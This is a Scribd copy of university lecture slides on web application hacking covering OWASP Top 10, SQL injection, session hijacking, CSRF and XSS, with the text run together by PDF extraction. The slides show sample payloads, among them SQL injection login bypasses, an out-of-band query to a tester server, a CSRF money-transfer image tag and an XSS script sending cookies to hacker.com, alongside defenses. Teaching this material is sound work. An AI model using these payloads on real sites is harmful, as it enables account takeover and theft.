Scribd Logo
Upload

Welcome to Scribd!

  • Web Hacking

    Uploaded by

    Joshua
    39 views19 pages
    Libro para seguridad informática

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Libro para seguridad informática

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    39 views19 pages

    Web Hacking

    Uploaded by

    Joshua
    Libro para seguridad informática

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 19

    13/03/2015

    HACKING
    SCHOOL
    HackingdeaplicacionesWeb
    GabrielMaci Fernndez

    Fundamentosdelaweb
    CLIENTE
    BROWSER

    DATOS
    PRIVADOS

    SERVIDOR

    HTTP

    WEBSERVER

    BASEDE
    DATOS

    13/03/2015

    Interaccinconservidoresweb
    URLs
    http://gmacia:pass@www.ugr.es:80/descarga.php?file=prueba
    .txt

    Esquema
    Autoridad:servidor(consultaDNS)
    Camino
    Argumentos

    Interaccinconservidoresweb

    13/03/2015

    WEBAPPLICATIONATTACKS

    OWASP

    Briefhistory
    OWASPTop10 2013
    1. Injection
    2. Brokenauthenticationandsession management
    3. CrossSiteScripting(XSS)
    4. InsecureDirectObjectReferences
    5. SecurityMisconfiguration
    6. SensitiveDataExposure
    7. MissingFunctionLevelAccessControl
    8. CrossSiteRequestForgery
    9. Usingcomponentswithknownvulnerabilities
    10. UnvalidateRedirectsandForwards

    13/03/2015

    INJECTIONATTACKS

    Injectionattacks
    Fundamento:datosnoconfiablessonenviadosa
    unintrpretecomopartedeuncomandoo
    consulta.
    Algunostipos:

    SQLinjection
    LDAPinjection
    Commandinjection
    Hibernateinjection
    XPATHinjection
    LocalFileInclusion(LFI)
    RemoteFileInclusion (RFI)

    13/03/2015

    SQL(StandardQuery Language)
    Nombre

    Email

    Password

    Gabriel

    gmacia@ugr.es

    J3oldgs23

    Juan

    juan@ugr.es

    Sdwe3342&

    Luis

    luis@ugr.es

    34s3gsd23

    SELECT emailFROMUsers WHEREnombre=Gabriel;


    UPDATE Users SETemail=juan@correo.ugr.esWHERE
    nombre=Juan; Comentario
    INSERT INTOUsers Values (Pepe,pepe@correo.ugr.es,
    34Sgerud);
    DROP TABLEUsers;

    13/03/2015

    Cdigoenelservidor

    Login code (PHP)


    $result = mysql_query (select * from
    Users where (name=$user and
    password=$pass););

    SQLinjection

    Gabriel OR 1=1); --

    $result = mysql_query (select * from Users


    where (name=Gabriel OR 1=1); -password=$quemasda));

    13/03/2015

    Loprobamos?

    Other attack techniques


    SELECT field1, field2, field3 FROM Users
    WHERE Id='$Id'

    Boolean exploitation
    $Id=1'ANDASCII(SUBSTRING(username,1,1))=97AND'1'='1

    Errorbased exploitation
    INPUT:
    id=10||UTL_INADDR.GET_HOST_NAME((SELECTuserFROM
    DUAL))
    OUTPUT:
    ORA292257:hostSCOTTunknown

    13/03/2015

    Other attack techniques


    Out ofBandexploitation
    INPUT:
    id=10||UTL_HTTP.request(testerserver.com:80||(SELECTuser
    FROMDUAL)
    OUTPUT:
    /home/tester/nc nLp 80
    GET/SCOTTHTTP/1.1
    Host:testerserver.com
    Connection:close

    Timedelayexploitation
    id=10ANDIF(version()like5%,sleep(10),false))

    13/03/2015

    SQLInjection defenses (I)


    InputValition(Sanitizeyourinputs)
    Blacklisting
    Deletethecharactersyoudonotwant.E.g.;
    Downside:JohnOConnor

    Escaping
    Replaceproblematiccharacterswithsafeones
    Changeto\

    Libstodothis

    Whitelisting
    E.g.Integerwiththerightrange

    SQLInjection defenses (II)


    Preparedstatements
    Decouplethecodeandthedata
    $result = mysql_query (select * from Users
    where (name=$user and password=$pass););
    $db = new mysql (localhost, user, pass, DB);
    $query = $db->prepare(select * from Users where
    (name=? and password=?););
    $query->bind_param(ss, $user, $pass);
    $query->execute();

    13/03/2015

    SQLInjection defenses (III)


    Mitigationstrategies
    Limitprivileges
    Encryptsensitivedata
    CreditCardsTable
    userPasswords

    SESSIONHIJACKINGATTACKS

    10

    13/03/2015

    StatefulHTTP
    HTTPis stateless
    Cookiesforimplementing statefulness

    SessionHijacking
    Knowing acookiegives you access with the
    privileges ofthe user that established that
    session
    How tosteal session cookies

    Compromise the serveror users machine/browser


    Predict it based on other information
    Sniff the network
    DNScachepoisoning
    Trick the user into thinking you areLinkedIn
    The user will send you the cookie
    Networkbased attacks

    11

    13/03/2015

    Loprobamos?

    Defenses
    Unpredictability
    Randomandlongcookies

    Timeoutsessionsanddeletetokens
    IPAddresscheck(Doubtfuldefense)
    Maybeproblematic
    ChangeofIPduetoDHCP,WIFIto3G
    SameIPforNATboxes

    12

    13/03/2015

    CROSSSITEREQUESTFORGERY
    (CSRF)ATTACKS

    Fundaments
    Imaginethat
    Auser is logged inwith an activesession cookie
    This request is issued
    http://banco.com/transfer?cant=6000&a=hacker

    How could you get auser tovisit this link?

    13

    13/03/2015

    CSRFattack
    <img src=http://banco.com/transfer?cant=6000&a=hacker>

    hacker.com

    Cookie

    browser

    $$$

    banco.com

    Defenses
    UsingREFERERfield
    Problems:
    Refererisoptional
    Attackercanforcereferernottobesent
    Maninthemiddle
    Browservulnerability
    Bounceuseroffofapageas:ftp://page

    Usingsecretized links
    http://website.com/algo.html?sid=81sdgs234e

    14

    13/03/2015

    CROSSSITESCRIPTING(XSS)
    ATTACKS

    Sameoriginpolicy
    JavaScriptenablesWeb2.0

    Modifywebpages(DOM)
    TrackEvents
    Issuewebrequestsandmaintainconnections(AJAX)
    Readandsetcookies

    Browsersprovideisolationforjavascriptscripts
    viatheSameOriginPolicy
    OnlyScriptsreceivedfromawebpagesoriginhave
    accesstothepageselements

    15

    13/03/2015

    Stored XSSattack
    GET http://banco.com/roba?c=document.cookie

    hacker.com

    1
    browser

    Inyecta
    script
    malicioso

    4
    Ejecutaelscript
    Comosielservidor
    noslohubiera
    solicitado

    banco.com

    GET http://banco.com/transfer?cant=6000&a=hacker

    Reflected XSSattack
    hacker.com

    browser

    URLespecialmente
    construidaparaelataque

    5
    Ejecutaelscript
    Comosielservidor
    noslohubiera
    solicitado

    banco.com

    16

    13/03/2015

    Echoofuser input
    The key:finding situations where aserver
    echoes the user inputbackinthe HTML
    response
    Example:
    GET http://victim.com/search.php?term=guitars

    Result from victim.com:


    <html> <title> Search results </title>
    <body>
    Results for guitars:

    </body></html>

    Exploiting echoed input


    http://victim.com/search.php?term=
    <script> window.open(
    http://hacker.com/steal?c=
    + document.cookie)
    </script>

    Result from victim.com:


    <html> <title> Search results
    </title>
    <body>
    Results for <script> </script>:

    </body></html>

    17

    13/03/2015

    Loprobamos?

    Defenses
    Sanitizing:remove executable portions of
    userprovided input
    Doneon many blogs.E.g.wordpress
    https://wordpress.org/plugins/htmlpurified/

    Blacklist vsWhitelist

    18

    13/03/2015

    Elreto

    Thanks for your attention

    Thanks to:
    MichaelHicks for its nice examples about webattacks

    19

    You might also like